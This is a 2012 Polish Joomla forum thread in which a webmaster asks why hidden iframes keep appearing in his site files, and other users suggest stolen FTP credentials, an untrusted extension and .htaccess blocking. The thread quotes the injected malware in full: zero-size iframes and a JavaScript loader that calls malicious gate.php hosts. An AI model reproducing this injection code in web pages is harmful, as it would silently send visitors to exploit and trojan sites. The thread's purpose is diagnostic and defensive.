Zobacz pełną wersję : Problem z wirusem -> iframe src=http://s1.kaluchka1.in/
krzychoooo
12-01-2012, 14:06
Witam
Co kilka dni do plików php html js dokleja mi się taki kod:
<!--qpi--><iframe src=http://s1.kaluchka1.in/gate.php?f=955068 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi-->
Jak coś chce zmienić na stronie to :
- kasuje całą stronę i bazę danych.
- przywracam stronę z kopi która w żadnym pliku nie ma takiego kodu .
- dokonuje zmiany.
- robię kopie (Akeea backup)
Od jakiegoś czasu nie moge dojść skąd to się bierze.
Joomla 1.7.3
Ustawienia php według zaleceń, .htaccess funkcjonuje.
Czy miał ktoś podobny problem?
Od jakiegoś czasu nie moge dojść skąd to się bierze.
Strzelę w ciemno - zainstalowałeś jakieś rozszerzenie pochodzące z niepewnego źródła, nie daj Boże z jakiegoś wareza na przykład?
Zmień hasła (zaplecze, serwer FTP), ściągnij witrynę na serwer lokalny i szukaj źródła problemu.
robak142
12-01-2012, 14:12
Prawdopodobnie wykradziono Ci hasła do ftp. Po pierwsze zmień hasła ftp, po drugie nie wpisuj ich na stałe np w TC, po trzecie dogłębnie przeskanuj komputer.
krzychoooo
12-01-2012, 14:28
Dodatki komponenty itd pobierałem z http://extensions.joomla.org/.
Szablon zakupiony w firmie SmartAddons.Com.
Zainstalowany dodatek "spadaj".
Hasło do ftp już zmieniałem.
Komputer przeskanowany avast'em.
Hasło nie zapisane na twardym. Hmm tylko jeśli coś mi nasłuc***e na porcie 21 to i tak przechwyci hasło.
Czy da się w XP jakoś założyć loga co się dzieje na porcie 21?
W plikach js jet oczywiście trochę inny wpis:
/*qpi*/
function g(){var r=new RegExp('(?:; )?1=([^;]*);?');return r.test(document.cookie)?true:false}
var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled)
{
document.cookie='1=1;expires='+e.toGMTString()+';p ath=/';
window.setTimeout(function(){
var JSinj=document.createElement('iframe');
JSinj.src='http://s1.kaluchka1.in/gate.php?f=955068&r='+escape(document.referrer||'');
JSinj.width='0';
JSinj.height='0';
JSinj.frameborder='0';
JSinj.marginheight='0';
JSinj.marginwidth='0';
JSinj.border='0';
try{
document.body.appendChild(JSinj);
}catch(e){
document.documentElement.appendChild(JSinj);
}
}, 2000);
}
/*qpi*/
Komputer przeskanowany avast'em.
Proponuję coś lepszego zainstalować. Kaspersky Internet Security nie jest drogi.
krzychoooo
12-01-2012, 16:21
W plikach szablonu znalazłem taki kod:
<!--qpi--><iframe src=http://googlecounter.in/gate.php?f=861280 frameborder=0 marginheight=0 marginwidth=0 scrolling=0 width=0 height=0 border=0></iframe><!--/qpi--><!--qpi--><!--/qpi--><!--qpi--><!--qpi-->
na stronie googli do diagnozowania witryn
http://google.com/safebrowsing/diagnostic?site=googlecounter.in/&hl=pl
Jest taki wpis:
Bezpieczne przeglądanie
Strona diagnostyczna witryny googlecounter.in
Jaki jest obecny stan bezpieczeństwa witryny googlecounter.in?
Ta witryna nie jest obecnie uznawana za podejrzaną.
Co się stało podczas odwiedzin tej witryny przez Google?
W ciągu ostatnich 90 dni przetestowaliśmy w tej witrynie następującą liczbę stron: 880. Wyświetlanie 0 z nich spowodowało pobranie i zainstalowanie złośliwego oprogramowania bez zgody użytkownika. Witryna ta po raz ostatni była odwiedzana przez Google 2012-01-11, a po raz ostatni znaleziono w niej podejrzane treści 2012-01-11.
Złośliwe oprogramowanie obejmuje 423 trojan(s), 72 exploit(s), 69 scripting exploit(s).
Ta witryna działała w następującej liczbie sieci: 2, m.in. AS35017 (SWIFTWAY), AS24971 (MASTER).
Czy ta witryna pośredniczyła w rozpowszechnianiu złośliwego oprogramowania?
Wydaje się, że w ciągu ostatnich 90 dni witryna googlecounter.in pośredniczyła w zarażeniu następującej liczby witryn: 125, m.in. haberunye.com/, euromarkt.pl/, lospeques.com/.
Co to jest ten googlecounter ?
mjmartino
12-01-2012, 20:28
Jak masz jakieś podejrzenia co do obcego iframe co jest zresztą dziwne w szablonie to go usuń i poczekaj na efekty.
zwrócona zawartość iframe
The requested URL /out.php?p=mhaBxKqEnAXIVTaOhY2k43ObuL3W2SoC0oi6MHkU wsOOmiF0ZgONSaEMHm2qXTmHFDxGZbvJNUJg43GRLptlNkBhD+ jA08CshZKWHhmTzAL3FzsNDDNwPHa1Fngdwg==&nc=false&nj=false&ic=false&ds=false&iu=false&wc=false&sw=1680&sh=1050&sd=32&np=false&pm=Win32&is_iframe=false& was not found on this server.
Czy to coś zbiera informacje a przynajmniej uzyskuje rozdzielczość głębie oraz system : )
Poza tym domena .in wskazuje na INDIE czyli kraj wysokiego ryzyka rozsyłania różnych rzeczy.. wiec .httaccess i deny dla owej domeny; )
vBulletin® v4.2.5, Prawa przedruku © 2024 vBulletin Solutions, Inc. Wszystkie prawa zastrzeżone.
Tłumaczenie: Polskie Centrum Joomla!